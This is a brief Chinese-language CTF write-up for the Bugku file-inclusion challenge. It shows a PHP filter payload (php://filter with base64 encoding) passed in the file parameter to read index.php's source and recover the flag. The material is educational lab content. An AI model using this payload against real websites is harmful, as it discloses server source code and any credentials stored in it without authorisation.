bugku--文件包含

点击

访问一下index.php

页面报错

既然是文件包含就可以想到php伪协议

这里我们需要访问本地文件系统 构造我们的payload

?file=php://filter/read=convert.base64-encode/resource=index.php

base64解码

得到我们的flag 提交就好啦

?file=php://filter/read=convert.base64-encode/resource=index.php

?file=php://filter/read=convert.base64-encode/resource=index.php

file 访问本地系统,以php的形式,过滤读取 以base64的形式输出出来index.php里面的内容

相关推荐
saulgoodman-q21 小时前
Pwncollege V8 Exploitation (中)
pwn·ctf
Chen--Xing1 天前
DASCTF 2025下半年|矩阵博弈,零度突围 Crypto -- Serration详解
密码学·ctf·buuctf·crypto·dasctf
Chen--Xing2 天前
2025鹏城杯 -- Crypto -- RandomAudit详解
python·密码学·ctf·鹏城杯
pandarking2 天前
[CTF]攻防世界:easy_laravel 学习
java·学习·web安全·laravel·ctf
pandarking3 天前
[CTF]攻防世界:web-unfinish(sql二次注入)
前端·数据库·sql·web安全·ctf
wyjcxyyy5 天前
Polar-MISC-WEB(困难)
web·ctf·misc·polar
码农12138号5 天前
服务端请求伪造-SSRF 学习笔记
笔记·web安全·网络安全·ctf·ssrf·服务端请求伪造
漏洞文库-Web安全6 天前
AWD比赛随笔
开发语言·python·安全·web安全·网络安全·ctf·awd
白帽子黑客杰哥6 天前
CTF Web题目常用考点与解题技巧合集
前端·数据库·web安全·网络安全·ctf·信息收集
码农12138号6 天前
Bugku HackINI 2022 Whois 详解
linux·web安全·ctf·命令执行·bugku·换行符